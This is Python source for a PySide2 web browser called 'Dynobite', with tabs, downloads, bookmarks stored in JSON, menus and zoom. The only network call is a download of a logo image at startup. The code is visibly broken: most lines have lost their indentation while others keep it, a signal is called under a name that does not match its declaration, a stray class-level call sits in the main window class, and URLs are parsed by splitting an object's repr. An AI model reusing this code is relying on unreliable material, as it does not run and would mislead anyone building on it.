        if state == QWebEngineDownloadItem.DownloadRequested:
            tool_tip += "\n(requested)"
        elif state == QWebEngineDownloadItem.DownloadInProgress:
            tool_tip += "\n(downloading)"
        elif state == QWebEngineDownloadItem.DownloadCompleted:
            tool_tip += "\n(completed)"
        elif state == QWebEngineDownloadItem.DownloadCancelled:
            tool_tip += "\n(cancelled)"
        else:
            tool_tip += "\n(interrupted)"
        self.setToolTip(tool_tip)
    def _download_progress(self, bytes_received, bytes_total):
        """Update the bar; guards against unknown (non-positive) total size,
        which previously raised ZeroDivisionError."""
        if bytes_total > 0:
            self.setValue(int(100 * bytes_received / bytes_total))
    def _finished(self):
        """Refresh the tool tip and re-emit as this widget's own signal."""
        self._update_tool_tip()
        self.finished.emit()
    def _launch(self):
        """Open the downloaded file with the default application."""
        DownloadWidget.open_file(self._download_item.path())
    def mouseDoubleClickEvent(self, event):
        """Double-click launches the file once the download completed."""
        if self.state() == QWebEngineDownloadItem.DownloadCompleted:
            self._launch()
    def contextMenuEvent(self, event):
        """Context menu with state-dependent Launch/Show/Cancel/Remove actions."""
        state = self.state()
        context_menu = QMenu()
        launch_action = context_menu.addAction("Launch")
        launch_action.setEnabled(state == QWebEngineDownloadItem.DownloadCompleted)
        show_in_folder_action = context_menu.addAction("Show in Folder")
        show_in_folder_action.setEnabled(state == QWebEngineDownloadItem.DownloadCompleted)
        cancel_action = context_menu.addAction("Cancel")
        cancel_action.setEnabled(state == QWebEngineDownloadItem.DownloadInProgress)
        remove_action = context_menu.addAction("Remove")
        remove_action.setEnabled(state != QWebEngineDownloadItem.DownloadInProgress)
        chosen_action = context_menu.exec_(event.globalPos())
        if chosen_action == launch_action:
            self._launch()
        elif chosen_action == show_in_folder_action:
            path = QFileInfo(self._download_item.path()).absolutePath()
            DownloadWidget.open_file(path)
        elif chosen_action == cancel_action:
            self._download_item.cancel()
        elif chosen_action == remove_action:
            self.remove_requested.emit()
class BrowserTabWidget(QTabWidget):
"""Enables having several tabs with QWebEngineView."""
url_changed = QtCore.Signal(QUrl)
enabled_changed = QtCore.Signal(QWebEnginePage.WebAction, bool)
download_requested = QtCore.Signal(QWebEngineDownloadItem)
    def __init__(self, window_factory_function):
        """Set up a closable tab bar and per-WebAction enabled bookkeeping.

        Args:
            window_factory_function: zero-arg callable creating a new
                top-level browser view (passed on to every tab).
        """
        super(BrowserTabWidget, self).__init__()
        self.setTabsClosable(True)
        self._window_factory_function = window_factory_function
        self._webengineviews = []
        self._history_windows = {}  # map WebengineView to HistoryWindow
        self.currentChanged.connect(self._current_changed)
        self.tabCloseRequested.connect(self.handle_tab_close_request)
        # Cached enabled flags so enabled_changed fires only on transitions.
        self._actions_enabled = {}
        for web_action in WebEngineView.web_actions():
            self._actions_enabled[web_action] = False
        tab_bar = self.tabBar()
        tab_bar.setSelectionBehaviorOnRemove(QTabBar.SelectPreviousTab)
        tab_bar.setContextMenuPolicy(Qt.CustomContextMenu)
        tab_bar.customContextMenuRequested.connect(self._handle_tab_context_menu)
    def add_browser_tab(self):
        """Create a new WebEngineView tab (initially loading Google), wire
        its page/view signals to this widget, make it current and return it."""
        qurl = QUrl("https://www.google.com")
        # The view spawns further tabs by calling back into this method.
        factory_func = partial(BrowserTabWidget.add_browser_tab, self)
        web_engine_view = WebEngineView(factory_func,
                                        self._window_factory_function)
        index = self.count()
        web_engine_view.setUrl(qurl)
        self._webengineviews.append(web_engine_view)
        title = 'Tab {}'.format(index + 1)
        self.addTab(web_engine_view, title)
        page = web_engine_view.page()
        page.titleChanged.connect(self._title_changed)
        page.iconChanged.connect(self._icon_changed)
        page.profile().downloadRequested.connect(self._download_requested)
        web_engine_view.urlChanged.connect(self._url_changed)
        web_engine_view.enabled_changed.connect(self._enabled_changed)
        self.setCurrentIndex(index)
        return web_engine_view
    def _on_fullscreen_requested(self, request):
        """Grant a page's JavaScript fullscreen request.

        NOTE(review): the request is accepted so the page believes fullscreen
        was granted, but the widget itself is never switched to fullscreen;
        `on` is read but unused. Presumably unfinished — confirm intent.
        """
        request.accept()
        on = request.toggleOn()
def load(self, url):
index = self.currentIndex()
if index >= 0 and url.isValid():
self._webengineviews[index].setUrl(url)
def find(self, needle, flags):
index = self.currentIndex()
if index >= 0:
self._webengineviews[index].page().findText(needle, flags)
def url(self):
index = self.currentIndex()
return self._webengineviews[index].url() if index >= 0 else QUrl()
def _url_changed(self, url):
index = self.currentIndex()
if index >= 0 and self._webengineviews[index] == self.sender():
self.url_changed.emit(url)
def _title_changed(self, title):
index = self._index_of_page(self.sender())
if (index >= 0):
self.setTabText(index, BookmarkWidget.short_title(title))
def _icon_changed(self, icon):
index = self._index_of_page(self.sender())
if (index >= 0):
self.setTabIcon(index, icon)
def _enabled_changed(self, web_action, enabled):
index = self.currentIndex()
if index >= 0 and self._webengineviews[index] == self.sender():
self._check_emit_enabled_changed(web_action, enabled)
def _check_emit_enabled_changed(self, web_action, enabled):
if enabled != self._actions_enabled[web_action]:
self._actions_enabled[web_action] = enabled
self.enabled_changed.emit(web_action, enabled)
def _current_changed(self, index):
self._update_actions(index)
self.url_changed.emit(self.url())
def _update_actions(self, index):
if index >= 0 and index < len(self._webengineviews):
view = self._webengineviews[index]
for web_action in WebEngineView.web_actions():
enabled = view.is_web_action_enabled(web_action)
self._check_emit_enabled_changed(web_action, enabled)
    # Thin delegates: each triggers the corresponding QWebEnginePage web
    # action on the currently selected tab (a no-op when no tab is open,
    # because _trigger_action checks the current index).
    def back(self):
        self._trigger_action(QWebEnginePage.Back)
    def forward(self):
        self._trigger_action(QWebEnginePage.Forward)
    def reload(self):
        self._trigger_action(QWebEnginePage.Reload)
    def undo(self):
        self._trigger_action(QWebEnginePage.Undo)
    def redo(self):
        self._trigger_action(QWebEnginePage.Redo)
    def cut(self):
        self._trigger_action(QWebEnginePage.Cut)
    def copy(self):
        self._trigger_action(QWebEnginePage.Copy)
    def paste(self):
        self._trigger_action(QWebEnginePage.Paste)
    def select_all(self):
        self._trigger_action(QWebEnginePage.SelectAll)
    def show_history(self):
        """Show a non-modal History window for the current tab.

        One HistoryWindow is created lazily per view and cached in
        self._history_windows; a cached window is refreshed before reuse.
        """
        index = self.currentIndex()
        if index >= 0:
            webengineview = self._webengineviews[index]
            history_window = self._history_windows.get(webengineview)
            if not history_window:
                history = webengineview.page().history()
                history_window = HistoryWindow(history, self)
                history_window.open_url.connect(self.load)
                # Promote the child widget to a top-level window.
                history_window.setWindowFlags(history_window.windowFlags()
                                              | Qt.Window)
                history_window.setWindowTitle('History')
                self._history_windows[webengineview] = history_window
            else:
                history_window.refresh()
            history_window.show()
            history_window.raise_()
def zoom_factor(self):
return self._webengineviews[0].zoomFactor() if self._webengineviews else 1.0
def set_zoom_factor(self, z):
for w in self._webengineviews:
w.setZoomFactor(z)
def _handle_tab_context_menu(self, point):
index = self.tabBar().tabAt(point)
if index < 0:
return
tab_count = len(self._webengineviews)
context_menu = QMenu()
new_tab_action = context_menu.addAction("New Tab")
refresh_action = context_menu.addAction("Reload")
duplicate_tab_action = context_menu.addAction("Duplicate Tab")
close_other_tabs_action = context_menu.addAction("Close Other Tabs")
close_other_tabs_action.setEnabled(tab_count > 1)
close_tabs_to_the_right_action = context_menu.addAction("Close Tabs to the Right")
close_tabs_to_the_right_action.setEnabled(index < tab_count - 1)
close_tab_action = context_menu.addAction("&Close Tab")
chosen_action = context_menu.exec_(self.tabBar().mapToGlobal(point))
if chosen_action == duplicate_tab_action:
current_url = self.url()
self.add_browser_tab().load(current_url)
elif chosen_action == new_tab_action:
current_url = "https://www.google.com"
self.add_browser_tab().load(current_url)
elif chosen_action == refresh_action:
self.reload()
elif chosen_action == close_other_tabs_action:
for t in range(tab_count - 1, -1, -1):
if t != index:
self.handle_tab_close_request(t)
elif chosen_action == close_tabs_to_the_right_action:
for t in range(tab_count - 1, index, -1):
self.handle_tab_close_request(t)
elif chosen_action == close_tab_action:
self.handle_tab_close_request(index)
    def handle_tab_close_request(self, index):
        """Close the tab at *index*; the last remaining tab is never closed."""
        if (index >= 0 and self.count() > 1):
            webengineview = self._webengineviews[index]
            # Drop the cached per-view history window, if one was created.
            if self._history_windows.get(webengineview):
                del self._history_windows[webengineview]
            self._webengineviews.remove(webengineview)
            self.removeTab(index)
def close_current_tab(self):
self.handle_tab_close_request(self.currentIndex())
def _trigger_action(self, action):
index = self.currentIndex()
if index >= 0:
self._webengineviews[index].page().triggerAction(action)
def _index_of_page(self, web_page):
for p in range(0, len(self._webengineviews)):
if (self._webengineviews[p].page() == web_page):
return p
return -1
def _download_requested(self, item):
self.download_requested.emit(item)
_url_role = Qt.UserRole + 1
# Default bookmarks as an array of arrays which is the form
# used to read from/write to a .json bookmarks file
_default_bookmarks = [
['Tool Bar'],
]
def _config_dir():
return '{}/QtForPythonBrowser'.format(
QStandardPaths.writableLocation(QStandardPaths.ConfigLocation))
_bookmark_file = 'bookmarks.json'
def _create_folder_item(title):
result = QStandardItem(title)
result.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
return result
def _create_item(url, title, icon):
result = QStandardItem(title)
result.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
result.setData(url, _url_role)
if icon is not None:
result.setIcon(icon)
return result
# Create the model from an array of arrays
def _create_model(parent, serialized_bookmarks):
    """Build a QStandardItemModel from the array-of-arrays bookmark format.

    Each entry is either ``[folder_title]`` (starts a new folder row) or
    ``[url, title, icon_path?]`` (a bookmark attached to the most recent
    folder).
    """
    result = QStandardItemModel(0, 1, parent)
    last_folder_item = None
    for entry in serialized_bookmarks:
        if len(entry) == 1:
            last_folder_item = _create_folder_item(entry[0])
            result.appendRow(last_folder_item)
        elif last_folder_item is not None:
            # Guard added: a bookmark entry appearing before any folder entry
            # previously hit last_folder_item == None and raised
            # AttributeError; such malformed entries are now skipped.
            url = QUrl.fromUserInput(entry[0])
            title = entry[1]
            icon = QIcon(entry[2]) if len(entry) > 2 and entry[2] else None
            last_folder_item.appendRow(_create_item(url, title, icon))
    return result
# Serialize model into an array of arrays, writing out the icons
# into .png files under directory in the process
def _serialize_model(model, directory):
    """Serialize *model* back into the array-of-arrays bookmark format.

    Folder rows become single-element lists; bookmark rows become
    ``[url, title, icon_path?]``. Each non-null icon is written to a PNG
    file in *directory* at its largest available size.
    """
    result = []
    folder_count = model.rowCount()
    for f in range(0, folder_count):
        folder_item = model.item(f)
        result.append([folder_item.text()])
        item_count = folder_item.rowCount()
        for i in range(0, item_count):
            item = folder_item.child(i)
            entry = [item.data(_url_role).toString(), item.text()]
            icon = item.icon()
            # Guard added: the original indexed icon_sizes[-1] without
            # checking for an empty list, which can IndexError for icons
            # that report no available pixmap sizes.
            icon_sizes = icon.availableSizes() if not icon.isNull() else []
            if icon_sizes:
                largest_size = icon_sizes[len(icon_sizes) - 1]
                icon_file_name = '{}/icon{:02}_{:02}_{}.png'.format(directory,
                                                                    f, i,
                                                                    largest_size.width())
                icon.pixmap(largest_size).save(icon_file_name, 'PNG')
                entry.append(icon_file_name)
            result.append(entry)
    return result
# Bookmarks as a tree view to be used in a dock widget with
# functionality to persist and populate tool bars and menus.
class BookmarkWidget(QTreeView):
"""Provides a tree view to manage the bookmarks."""
open_bookmark = QtCore.Signal(QUrl)
open_bookmark_in_new_tab = QtCore.Signal(QUrl)
changed = QtCore.Signal()
def __init__(self):
super(BookmarkWidget, self).__init__()
self.setRootIsDecorated(False)
self.setUniformRowHeights(True)
self.setHeaderHidden(True)
self._model = _create_model(self, self._read_bookmarks())
self.setModel(self._model)
self.expandAll()
self.activated.connect(self._activated)
self._model.rowsInserted.connect(self._changed)
self._model.rowsRemoved.connect(self._changed)
self._model.dataChanged.connect(self._changed)
self._modified = False
self.customContextMenuRequested.connect(self.context_menu_event)
def _changed(self):
self._modified = True
self.changed.emit()
def _activated(self, index):
item = self._model.itemFromIndex(index)
self.open_bookmark.emit(item.data(_url_role))
def _action_activated(self, index):
action = self.sender()
self.open_bookmark.emit(action.data())
def _tool_bar_item(self):
return self._model.item(0, 0)
def _other_item(self):
return self._model.item(1, 0)
def add_bookmark(self, url, title, icon):
self._other_item().appendRow(_create_item(url, title, icon))
def add_tool_bar_bookmark(self, url, title, icon):
self._tool_bar_item().appendRow(_create_item(url, title, icon))
# Synchronize the bookmarks under parent_item to a target_object
# like QMenu/QToolBar, which has a list of actions. Update
# the existing actions, append new ones if needed or hide
# superfluous ones
def _populate_actions(self, parent_item, target_object, first_action):
existing_actions = target_object.actions()
existing_action_count = len(existing_actions)
a = first_action
row_count = parent_item.rowCount()
for r in range(0, row_count):
item = parent_item.child(r)
title = item.text()
icon = item.icon()
url = item.data(_url_role)
if a < existing_action_count:
action = existing_actions[a]
if (title != action.toolTip()):
action.setText(BookmarkWidget.short_title(title))
action.setIcon(icon)
action.setToolTip(title)
action.setData(url)
action.setVisible(True)
else:
short_title = BookmarkWidget.short_title(title)
action = target_object.addAction(icon, short_title)
action.setToolTip(title)
action.setData(url)
action.triggered.connect(self._action_activated)
a = a + 1
while a < existing_action_count:
existing_actions[a].setVisible(False)
a = a + 1
def populate_tool_bar(self, tool_bar):
self._populate_actions(self._tool_bar_item(), tool_bar, 0)
def populate_other(self, menu, first_action):
self._populate_actions(self._other_item(), menu, first_action)
def _current_item(self):
index = self.currentIndex()
if index.isValid():
item = self._model.itemFromIndex(index)
if item.parent(): # exclude top level items
return item
return None
def context_menu_event(self, event):
context_menu = QMenu()
open_in_new_tab_action = context_menu.addAction("Open in New Tab")
remove_action = context_menu.addAction("Remove...")
current_item = self._current_item()
open_in_new_tab_action.setEnabled(current_item is not None)
remove_action.setEnabled(current_item is not None)
chosen_action = context_menu.exec_(event.globalPos())
if chosen_action == open_in_new_tab_action:
self.open_bookmarkInNewTab.emit(current_item.data(_url_role))
elif chosen_action == remove_action:
self._remove_item(current_item)
def _remove_item(self, item):
message = "Would you like to remove \"{}\"?".format(item.text())
button = QMessageBox.question(self, "Remove", message,
QMessageBox.Yes | QMessageBox.No)
if button == QMessageBox.Yes:
item.parent().removeRow(item.row())
def write_bookmarks(self):
if not self._modified:
return
dir_path = _config_dir()
native_dir_path = QDir.toNativeSeparators(dir_path)
dir = QFileInfo(dir_path)
if not dir.isDir():
if not QDir(dir.absolutePath()).mkpath(dir.fileName()):
warnings.warn('Cannot create {}.'.format(native_dir_path),
RuntimeWarning)
return
serialized_model = _serialize_model(self._model, dir_path)
bookmark_file_name = os.path.join(native_dir_path, _bookmark_file)
with open(bookmark_file_name, 'w') as bookmark_file:
json.dump(serialized_model, bookmark_file, indent=4)
def _read_bookmarks(self):
bookmark_file_name = os.path.join(QDir.toNativeSeparators(_config_dir()),
_bookmark_file)
if os.path.exists(bookmark_file_name):
return json.load(open(bookmark_file_name))
return _default_bookmarks
# Return a short title for a bookmark action,
# "Qt | Cross Platform.." -> "Qt"
@staticmethod
def short_title(t):
i = t.find(' | ')
if i == -1:
i = t.find(' - ')
return t[0:i] if i != -1 else t
main_windows = []
cwd = os.getcwd()
DYNOBITEFILES = "Dynobite Files"
DynobiteCreateFolder = os.path.join(cwd, DYNOBITEFILES)
DynobiteHistoryFolder = os.path.join(DYNOBITEFILES, "History.txt")
print("Dynobite\nVersion 94.0.992.31")
try:
os.mkdir(DynobiteCreateFolder)
except FileExistsError:
pass
picturefolder = "Images"
completedir = os.path.join(DynobiteCreateFolder, picturefolder)
def download(fullurl, downloadname):
    """Download *fullurl* into *downloadname*, skipping if the file exists.

    Parameters
    ----------
    fullurl : str
        Source URL to fetch.
    downloadname : str
        Destination file path.
    """
    import os
    fn = downloadname
    if os.path.isfile(fn):
        print('Skipping download, file exists {0}'.format(fn))
    else:
        print('Downloading file {0}'.format(fn))
        # Stdlib replacement for the previous third-party `requests` call;
        # imported lazily so the skip path needs no network stack. Unused
        # urlparse/Path imports and the unused `a` variable were removed.
        from urllib.request import urlopen
        with urlopen(fullurl) as response, open(fn, 'wb') as f:
            f.write(response.read())
try:
os.mkdir(completedir)
url="https://raw.githubusercontent.com/abhinavsatheesh/dynfiles/main/Dynobite/Images/1.png"
downloadpath=completedir
download(url,f'{downloadpath}/1.png')
except FileExistsError:
pass
def create_main_window():
"""Creates a MainWindow using 75% of the available screen resolution."""
main_win = MainWindow()
main_windows.append(main_win)
available_geometry = app.desktop().availableGeometry(main_win)
main_win.resize(available_geometry.width() * 2 / 3,
available_geometry.height() * 2 / 3)
main_win.show()
return main_win
def create_main_window_with_browser():
"""Creates a MainWindow with a BrowserTabWidget."""
main_win = create_main_window()
return main_win.add_browser_tab()
class AboutDialog(QDialog):
    """Modal "About" dialog showing the app logo, author links and version."""
    def __init__(self, *args, **kwargs):
        super(AboutDialog, self).__init__(*args, **kwargs)
        # Logo image is downloaded at startup into `completedir`.
        self.setWindowIcon(QIcon(os.path.join(completedir, '1.png')))
        QBtn = QDialogButtonBox.Ok # No cancel
        self.buttonBox = QDialogButtonBox(QBtn)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        layout = QVBoxLayout()
        title = QLabel("Dynobite - The Browser that is 2x Faster")
        font = title.font()
        font.setPointSize(20)
        title.setFont(font)
        layout.addWidget(title)
        logo = QLabel()
        logo.setPixmap(QPixmap(os.path.join(completedir, '1.png')))
        layout.addWidget(logo)
        layout.addWidget(QLabel("Built by Abhinav Satheesh"))
        layout.addWidget(QLabel("https://abhinavsatheesh.github.dyn.com/"))
        layout.addWidget(QLabel("GitHub Repository Link - https://github.com/abhinavsatheesh/dynfiles"))
        layout.addWidget(QLabel("Version 94.0.992.31"))
        # Center every row added so far, then append the button box last so
        # it keeps its default alignment.
        for i in range(0, layout.count()):
            layout.itemAt(i).setAlignment(Qt.AlignHCenter)
        layout.addWidget(self.buttonBox)
        self.setLayout(layout)
class MainWindow(QMainWindow):
"""Provides the parent window that includes the BookmarkWidget,
BrowserTabWidget, and a DownloadWidget, to offer the complete
web browsing experience."""
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle('Dynobite')
self._tab_widget = BrowserTabWidget(create_main_window_with_browser)
self._tab_widget.enabled_changed.connect(self._enabled_changed)
self._tab_widget.download_requested.connect(self._download_requested)
self.setCentralWidget(self._tab_widget)
self.connect(self._tab_widget, QtCore.SIGNAL("url_changed(QUrl)"),
self.url_changed)
self._bookmark_dock = QDockWidget()
self._bookmark_dock.setWindowTitle('Bookmarks')
self._bookmark_widget = BookmarkWidget()
self._bookmark_widget.open_bookmark.connect(self.load_url)
self._bookmark_widget.open_bookmark_in_new_tab.connect(self.load_url_in_new_tab)
self._bookmark_dock.setWidget(self._bookmark_widget)
self.addDockWidget(Qt.LeftDockWidgetArea, self._bookmark_dock)
self.setWindowIcon(QIcon(os.path.join(completedir, '1.png')))
self._find_tool_bar = None
self._bookmark_dock.customContextMenuRequested.connect(self.context_menu_event)
# self.view = QtWebEngineWidgets.QWebEngineView()
self._actions = {}
self._create_menu()
self._tool_bar = QToolBar()
self.addToolBar(self._tool_bar)
for action in self._actions.values():
if not action.icon().isNull():
self._tool_bar.addAction(action)
self._addres_line_edit = QLineEdit()
self._addres_line_edit.setClearButtonEnabled(True)
self._addres_line_edit.returnPressed.connect(self.load)
self._tool_bar.addWidget(self._addres_line_edit)
self._zoom_label = QLabel()
self.statusBar().addPermanentWidget(self._zoom_label)
self._update_zoom_label()
self._bookmarksToolBar = QToolBar()
self.addToolBar(Qt.TopToolBarArea, self._bookmarksToolBar)
self.insertToolBarBreak(self._bookmarksToolBar)
self._bookmark_widget.changed.connect(self._update_bookmarks)
self._update_bookmarks()
self.page = QWebEnginePage()
def context_menu_event(self, event):
context_menu = QMenu()
open_in_new_tab_action = context_menu.addAction("Open in New Tab")
remove_action = context_menu.addAction("Remove...")
current_item = self._current_item()
open_in_new_tab_action.setEnabled(current_item is not None)
remove_action.setEnabled(current_item is not None)
chosen_action = context_menu.exec_(event.globalPos())
if chosen_action == open_in_new_tab_action:
self.open_bookmarkInNewTab.emit(current_item.data(_url_role))
elif chosen_action == remove_action:
self._remove_item(current_item)
def _update_bookmarks(self):
self._bookmark_widget.populate_tool_bar(self._bookmarksToolBar)
self._bookmark_widget.populate_other(self._bookmark_menu, 3)
def _create_menu(self):
file_menu = self.menuBar().addMenu("&File")
new_tab_action = QAction("New Tab", self,
shortcut='Ctrl+T',
triggered=self.add_browser_tab)
file_menu.addAction(new_tab_action)
new_window_action = QAction("New Window", self,
shortcut='Ctrl+N',
triggered=self.OPEN_NEW_WINDOW)
file_menu.addAction(new_window_action)
close_tab_action = QAction("Close Tab", self,
shortcut="Ctrl+W",
triggered=self._close_current_tab)
file_menu.addAction(close_tab_action)
new_window_action = QAction("Open File", self,
shortcut='Ctrl+O',
triggered=self.open_file)
file_menu.addAction(new_window_action)
exit_action = QAction(QIcon.fromTheme("application-exit"), "E&xit",
self, shortcut="Ctrl+Q", triggered=qApp.quit)
file_menu.addAction(exit_action)
navigation_menu = self.menuBar().addMenu("&Navigation")
style_icons = ':/qt-project.org/styles/commonstyle/images/'
back_action = QAction(QIcon.fromTheme("go-previous",
QIcon(style_icons + 'left-32.png')),
"Back", self,
shortcut=QKeySequence(QKeySequence.Back),
triggered=self._tab_widget.back)
self._actions[QWebEnginePage.Back] = back_action
back_action.setEnabled(False)
navigation_menu.addAction(back_action)
forward_action = QAction(QIcon.fromTheme("go-next",
QIcon(style_icons + 'right-32.png')),
"Forward", self,
shortcut=QKeySequence(QKeySequence.Forward),
triggered=self._tab_widget.forward)
forward_action.setEnabled(False)
self._actions[QWebEnginePage.Forward] = forward_action
navigation_menu.addAction(forward_action)
reload_action = QAction(QIcon(style_icons + 'refresh-32.png'),
"Reload", self,
shortcut=QKeySequence(QKeySequence.Refresh),
triggered=self._tab_widget.reload)
self._actions[QWebEnginePage.Reload] = reload_action
reload_action.setEnabled(False)
navigation_menu.addAction(reload_action)
navigation_menu.addSeparator()
mute_action = QAction("Mute Tab", self,
shortcut="Ctrl+M",
triggered=self.MUTETAB)
navigation_menu.addAction(mute_action)
navigation_menu.addSeparator()
edit_menu = self.menuBar().addMenu("&Edit")
find_action = QAction("Find", self,
shortcut=QKeySequence(QKeySequence.Find),
triggered=self._show_find)
edit_menu.addAction(find_action)
edit_menu.addSeparator()
undo_action = QAction("Undo", self,
shortcut=QKeySequence(QKeySequence.Undo),
triggered=self._tab_widget.undo)
self._actions[QWebEnginePage.Undo] = undo_action
undo_action.setEnabled(False)
edit_menu.addAction(undo_action)
redo_action = QAction("Redo", self,
shortcut=QKeySequence(QKeySequence.Redo),
triggered=self._tab_widget.redo)
self._actions[QWebEnginePage.Redo] = redo_action
redo_action.setEnabled(False)
edit_menu.addAction(redo_action)
edit_menu.addSeparator()
cut_action = QAction("Cut", self,
shortcut=QKeySequence(QKeySequence.Cut),
triggered=self._tab_widget.cut)
self._actions[QWebEnginePage.Cut] = cut_action
cut_action.setEnabled(False)
edit_menu.addAction(cut_action)
copy_action = QAction("Copy", self,
shortcut=QKeySequence(QKeySequence.Copy),
triggered=self._tab_widget.copy)
self._actions[QWebEnginePage.Copy] = copy_action
copy_action.setEnabled(False)
edit_menu.addAction(copy_action)
paste_action = QAction("Paste", self,
shortcut=QKeySequence(QKeySequence.Paste),
triggered=self._tab_widget.paste)
self._actions[QWebEnginePage.Paste] = paste_action
paste_action.setEnabled(False)
edit_menu.addAction(paste_action)
edit_menu.addSeparator()
select_all_action = QAction("Select All", self,
shortcut=QKeySequence(QKeySequence.SelectAll),
triggered=self._tab_widget.select_all)
self._actions[QWebEnginePage.SelectAll] = select_all_action
select_all_action.setEnabled(False)
edit_menu.addAction(select_all_action)
self._bookmark_menu = self.menuBar().addMenu("&Bookmarks")
add_tool_bar_bookmark_action = QAction("&Add Bookmark", self,
shortcut="Ctrl+D",
triggered=self._add_tool_bar_bookmark)
self._bookmark_menu.addAction(add_tool_bar_bookmark_action)
self._bookmark_menu.addSeparator()
tools_menu = self.menuBar().addMenu("&Tools")
download_action = QAction("Open Downloads", self,
shortcut="Ctrl+J",
triggered=DownloadWidget.open_download_directory)
tools_menu.addAction(download_action)
history_action = QAction("History", self,
shortcut="Ctrl+H",
triggered=self._tab_widget.show_history)
tools_menu.addAction(history_action)
window_menu = self.menuBar().addMenu("&Window")
window_menu.addAction(self._bookmark_dock.toggleViewAction())
window_menu.addSeparator()
zoom_in_action = QAction(QIcon.fromTheme("zoom-in"),
"Zoom In", self,
shortcut=QKeySequence(QKeySequence.ZoomIn),
triggered=self._zoom_in)
window_menu.addAction(zoom_in_action)
zoom_out_action = QAction(QIcon.fromTheme("zoom-out"),
"Zoom Out", self,
shortcut=QKeySequence(QKeySequence.ZoomOut),
triggered=self._zoom_out)
window_menu.addAction(zoom_out_action)
reset_zoom_action = QAction(QIcon.fromTheme("zoom-original"),
"Reset Zoom", self,
shortcut="Ctrl+0",
triggered=self._reset_zoom)
window_menu.addAction(reset_zoom_action)
def open_file(self):
filename, _ = QFileDialog.getOpenFileName(self, "Open file", "",
"PDF Files (*.pdf);;"
"All files (*.*)")
split_tup = os.path.splitext(filename)
file_extension = split_tup[1]
if file_extension==".pdf":
root = Tk()
root.title("PDF Viewer")
root.geometry("550x750")
v1 = pdf.ShowPdf()
v2 = v1.pdf_view(root,
pdf_location = filename,
width = 750, height = 100)
v2.pack()
root.mainloop()
self._addres_line_edit.setText(filename)
    def MUTETAB(self):
        # NOTE(review): self.page is a standalone QWebEnginePage created in
        # __init__ and never shown; muting it does not silence the visible
        # tab's page. Presumably the current tab's page was intended —
        # TODO confirm.
        self.page.setAudioMuted(True)
def add_browser_tab(self):
return self._tab_widget.add_browser_tab()
QWebEnginePage.setUrl("https://www.google.com")
def _close_current_tab(self):
if self._tab_widget.count() > 1:
self._tab_widget.close_current_tab()
else:
self.close()
def print_page(self):
dlg = QPrintDialog(self.printer)
if dlg.exec_():
self.browser.page().print(self.printer, self.print_completed)
def print_completed(self, success):
pass
def OPEN_NEW_WINDOW(self):
create_main_window_with_browser()
def closeEvent(self, event):
if self._tab_widget.count() > 1:
reply = QMessageBox.question(self, 'Close all tabs?', f'You have {self._tab_widget.count()} tabs open', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
else:
self.close()
def load(self):
url_string = self._addres_line_edit.text().strip()
if validators.url(url_string):
q = QUrl(url_string)
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
elif validators.url(f"https://{url_string}"):
q = QUrl(f"http://{url_string}")
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
elif url_string.find("file:///") == 0 or url_string.find("view-source:") == 0 :
q = QUrl(url_string)
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
else:
url = f'https://www.google.com/search?q={url_string.replace("+","%2B").replace(" ","+")}'
q = QUrl(url)
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
self.load_url_string(urlfinal)
def load_url_string(self, url_s):
url = QUrl.fromUserInput(url_s)
if (url.isValid()):
self.load_url(url)
def load_url(self, url):
self._tab_widget.load(url)
def load_url_in_new_tab(self, url):
self.add_browser_tab().load(url)
def url_changed(self, url):
self._addres_line_edit.setText(url.toString())
def _enabled_changed(self, web_action, enabled):
action = self._actions[web_action]
if action:
action.setEnabled(enabled)
def _add_bookmark(self):
index = self._tab_widget.currentIndex()
if index >= 0:
url = self._tab_widget.url()
title = self._tab_widget.tabText(index)
icon = self._tab_widget.tabIcon(index)
self._bookmark_widget.add_bookmark(url, title, icon)
def _add_tool_bar_bookmark(self):
index = self._tab_widget.currentIndex()
if index >= 0:
url = self._tab_widget.url()
title = self._tab_widget.tabText(index)
icon = self._tab_widget.tabIcon(index)
self._bookmark_widget.add_tool_bar_bookmark(url, title, icon)
def _zoom_in(self):
new_zoom = self._tab_widget.zoom_factor() * 1.5
if (new_zoom <= WebEngineView.maximum_zoom_factor()):
self._tab_widget.set_zoom_factor(new_zoom)
self._update_zoom_label()
def _zoom_out(self):
new_zoom = self._tab_widget.zoom_factor() / 1.5
if (new_zoom >= WebEngineView.minimum_zoom_factor()):
self._tab_widget.set_zoom_factor(new_zoom)
self._update_zoom_label()
def _reset_zoom(self):
self._tab_widget.set_zoom_factor(1)
self._update_zoom_label()
def _update_zoom_label(self):
percent = int(self._tab_widget.zoom_factor() * 100)
self._zoom_label.setText("{}%".format(percent))
def _download_requested(self, item):
# Remove old downloads before opening a new one
for old_download in self.statusBar().children():
if (type(old_download).__name__ == 'DownloadWidget' and
old_download.state() != QWebEngineDownloadItem.DownloadInProgress):
self.statusBar().removeWidget(old_download)
del old_download
item.accept()
download_widget = DownloadWidget(item)
download_widget.remove_requested.connect(self._remove_download_requested,
Qt.QueuedConnection)
self.statusBar().addWidget(download_widget)
def _remove_download_requested(self):
download_widget = self.sender()
self.statusBar().removeWidget(download_widget)
del download_widget
def _show_find(self):
if self._find_tool_bar is None:
self._find_tool_bar = FindToolBar()
self._find_tool_bar.find.connect(self._tab_widget.find)
self.addToolBar(Qt.BottomToolBarArea, self._find_tool_bar)
else:
self._find_tool_bar.show()
self._find_tool_bar.focus_find()
def write_bookmarks(self):
self._bookmark_widget.write_bookmarks()
if __name__ == '__main__':
app = QApplication(sys.argv)
